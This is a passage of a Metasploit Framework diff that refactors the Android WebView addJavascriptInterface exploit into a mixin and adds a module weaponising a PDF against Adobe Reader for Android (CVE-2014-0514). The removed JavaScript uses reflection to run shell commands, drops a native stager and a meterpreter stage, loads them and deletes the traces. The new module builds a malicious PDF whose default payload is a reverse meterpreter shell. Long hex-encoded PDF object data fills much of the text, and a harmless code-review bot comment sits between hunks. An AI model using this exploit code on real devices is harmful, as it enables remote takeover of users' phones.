x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70
\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72
\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") + add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") + + @xref_offset = @pdf.length + @pdf << xref_table << trailer(25, eol) << startxref + + @pdf + end end end diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 373fc8f2fd..ea26cc19f8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
@@ -4,25 +4,13 @@ ## require 'msf/core' +require 'msf/core/exploit/android' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn - - # Since the NDK stager is used, arch detection must be performed - SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ] - - # Most android devices are ARM - DEFAULT_ARCH = ARCH_ARMLE - - # Some of the default NDK build targets are named differently than - # msf's builtin constants. This mapping allows the ndkstager file - # to be looked up from the msf constant. - NDK_FILES = { - ARCH_ARMLE => 'armeabi', - ARCH_MIPSLE => 'mips' - } + include Msf::Exploit::Android autopwn_info( :os_flavor => 'Android', 
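Review bot: The comments deleted here explained why arch detection is needed and why the NDK directory names differ from msf's arch constants, and the replacement line `include Msf::Exploit::Android` gives no hint of what it now supplies. A one-line comment above the include would keep that context, for example `# Msf::Exploit::Android: shared arch constants and add_javascript_interface_exploit_js`. This hunk does not show whether the mixin defines SUPPORTED_ARCHES, DEFAULT_ARCH and NDK_FILES, so any remaining references to them in the class should be checked against the mixin before merging. The class body continues outside the hunk.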
@@ -105,84 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html(arch)) end - # The NDK stager is used to launch a hidden APK - def ndkstager(stagename, arch) - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so') - data = File.read(localfile, :mode => 'rb') - data.gsub!('PLOAD', stagename) - end - - def js(arch) - stagename = Rex::Text.rand_text_alpha(5) - script = %Q| - function exec(runtime, cmdArr) { - var ch = 0; - var output = ''; - var process = runtime.exec(cmdArr); - var input = process.getInputStream(); - - while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); } - return output; - } - - function attemptExploit(obj) { - // ensure that the object contains a native interface - try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } - - // get the pid - var pid = obj.getClass() - .forName('android.os.Process') - .getMethod('myPid', null) - .invoke(null, null); - - // get the runtime so we can exec - var runtime = obj.getClass() - .forName('java.lang.Runtime') - .getMethod('getRuntime', null) - .invoke(null, null); - - // libraryData contains the bytes for a native shared object built via NDK - // which will load the "stage", which in this case is our android meterpreter stager. - // LibraryData is loaded via ajax later, because we have to access javascript in - // order to detect what arch we are running. - var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}"; - - // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains - // another stager which loads android meterpreter from the msf handler. 
- var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}"; - - // get the process name, which will give us our data path - // $PPID does not seem to work on android 4.0, so we concat pids manually - var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); - - var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; - var stagePath = path + '/#{stagename}.apk'; - - // build the library and chmod it - runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor(); - runtime.exec(['chmod', '700', libraryPath]).waitFor(); - - // build the stage, chmod it, and load it - runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor(); - runtime.exec(['chmod', '700', stagePath]).waitFor(); - - // load the library (this fails in x86, figure out why) - runtime.load(libraryPath); - - // delete dropped files - runtime.exec(['rm', stagePath]).waitFor(); - runtime.exec(['rm', libraryPath]).waitFor(); - - return true; - } - - for (i in top) { if (attemptExploit(top[i]) === true) break; } - | - - # remove comments and empty lines - script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '') - end - # Called when a client requests a .js route. # This is handy for post-XSS. def serve_static_js(cli, req) @@ -191,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote if arch.present? print_status("Serving javascript for arch #{normalize_arch arch}") - send_response(cli, js(normalize_arch arch), response_opts) + send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts) else print_status("Serving arch detection javascript") send_response(cli, static_arch_detect_js, response_opts) diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb new file mode 100644 index 0000000000..9f1dd2c4c1 --- /dev/null 
+++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb 
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/fileformat'
+require 'msf/core/exploit/pdf'
+require 'msf/core/exploit/android'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::PDF
+ include Msf::Exploit::Android
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Adobe Reader for Android addJavascriptInterface Exploit',
+ 'Description' => %q{
+ Adobe Reader < 11.2.0 exposed insecure native interfaces to untrusted
+ javascript in a PDF. This embeds the browser exploit from android/
+ webview_addjavascriptinterface into a PDF to get a shell.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Yorick Koster', # discoverer
+ 'joev' # msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2014-0514' ],
+ [ 'EDB', '32884' ],
+ [ 'OSVDB', '105781' ],
+ ],
+ 'Platform' => 'android',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'android/meterpreter/reverse_tcp'
+ },
+ 'Targets' => [
+ [ 'Android ARM', {
+ 'Platform' => 'android',
+ 'Arch' => ARCH_ARMLE
+ }
+ ],
+ [ 'Android MIPSLE', {
+ 'Platform' => 'android',
+ 'Arch' => ARCH_MIPSLE
+ }
+ ],
+ [ 'Android X86', {
+ 'Platform' => 'android',
+ 'Arch' => ARCH_X86
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Dec 21 2012',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
+ ], self.class)
+ end
+
+ def exploit
+ print_status("Generating Javascript exploit...")
+ js = add_javascript_interface_exploit_js(ARCH_ARMLE)
+ print_status("Creating PDF...")
+ file_create(pdf(js))
+ end
+
+ def pdf(js)
+ @eol = "\x0d"
+ @xref = {}
+ @pdf = header('1.6')
+
+ add_object(25, 
"\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") + add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(3, 
"\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e
\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x
d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\x75\x75\x69\x64\x3a\x39\x64\x38\x35\x36\x39\x65\x65\x2d\x37\x66\x64\x38\x2d\x34\x34\x62\x61\x2d\x39\x63\x38\x63\x2d\x36\x65\x35\x32\x32\x35\x33\x35\x39\x62\x61\x35\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\x75\x75\x69\x64\x3a\x34\x63\x37\x30\x34\x36\x62\x34\x2d\x30\x34\x39\x33\x2d\x39\x30\x34\x62\x2d\x61\x35\x35\x32\x2d\x64\x63\x31\x37\x38\x32\x63\x62\x33\x62\x62\x31\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x3c\x2f\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\xd\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\xd\x3c\x2f\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x2
0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20